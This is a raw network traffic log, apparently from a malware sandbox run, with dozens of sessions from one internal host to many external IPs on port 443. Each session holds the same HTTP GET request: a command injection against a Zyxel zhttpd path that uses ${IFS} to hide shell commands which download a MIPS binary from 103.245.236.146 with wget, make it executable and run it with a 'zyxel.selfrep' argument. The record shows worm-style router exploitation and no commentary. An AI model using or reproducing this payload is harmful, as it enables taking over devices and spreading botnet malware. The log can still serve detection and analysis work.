                                                        Jan 28, 2024 10:12:47.312822104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3167192.168.2.14335045.47.229.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312850952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3168192.168.2.1436506132.177.95.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312908888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3169192.168.2.1440528142.117.184.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.315736055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3170192.168.2.145815277.158.190.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.315766096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3171192.168.2.144451635.105.71.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.323870897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3172192.168.2.143983465.52.147.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.323918104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3173192.168.2.144894247.116.234.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.323964119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3174192.168.2.145876050.245.134.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.323998928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3175192.168.2.144221034.24.119.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324023962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3176192.168.2.144339884.173.208.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324064970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3177192.168.2.144602662.100.111.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324111938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3178192.168.2.1440108116.77.226.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324147940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3179192.168.2.1435180122.180.56.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324188948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3180192.168.2.1449290153.238.208.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324233055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3181192.168.2.144647896.35.99.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324273109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3182192.168.2.1436098158.226.174.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324314117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3183192.168.2.143429468.208.100.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324346066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3184192.168.2.143483625.81.16.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324402094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3185192.168.2.144199054.217.203.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324443102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3186192.168.2.1445070216.139.141.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324466944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3187192.168.2.145882423.221.221.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324501038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3188192.168.2.143795612.211.222.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324573994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3189192.168.2.143574876.180.57.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324603081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3190192.168.2.144330684.111.57.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324637890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3191192.168.2.1456414165.0.207.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324656010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192192.168.2.1456462111.80.88.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324707985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3193192.168.2.143810613.39.33.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324738979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3194192.168.2.143367464.124.86.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324798107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3195192.168.2.146091459.142.89.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324834108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3196192.168.2.144081449.135.51.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324887037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3197192.168.2.143755217.245.152.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324922085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3198192.168.2.1436712141.47.154.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.324970007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3199192.168.2.144972075.127.244.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325007915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3200192.168.2.145427440.165.211.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325031996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3201192.168.2.1440548148.77.164.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325079918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3202192.168.2.144033458.112.19.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325122118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3203192.168.2.1459724106.25.12.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325154066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3204192.168.2.1458552180.110.200.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325185061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3205192.168.2.1455588213.86.79.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325227976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3206192.168.2.143877681.105.29.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325264931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3207192.168.2.1437928110.154.19.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325325966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3208192.168.2.1443702129.191.40.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325350046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3209192.168.2.145383060.98.144.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325373888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3210192.168.2.145213649.112.205.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325419903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3211192.168.2.144867218.228.122.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325450897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3212192.168.2.1448206144.168.197.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325504065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3213192.168.2.1443050107.29.82.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325530052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3214192.168.2.143729493.198.44.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325560093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3215192.168.2.144663023.183.56.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325602055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3216192.168.2.1449242218.7.174.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325649023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3217192.168.2.145681258.200.204.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325681925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3218192.168.2.1449504177.191.51.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325722933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3219192.168.2.143388854.49.29.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325764894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3220192.168.2.1438366137.172.10.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325809956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3221192.168.2.145608671.91.165.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325843096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3222192.168.2.144834891.45.111.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325891972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3223192.168.2.1437554222.181.49.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325932026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3224192.168.2.143796823.94.169.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325942039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3225192.168.2.1435308186.253.152.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.325999022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3226192.168.2.1440784195.187.24.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.326021910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3227192.168.2.1444296175.194.72.160443
                                                        TimestampBytes transferredDirectionData
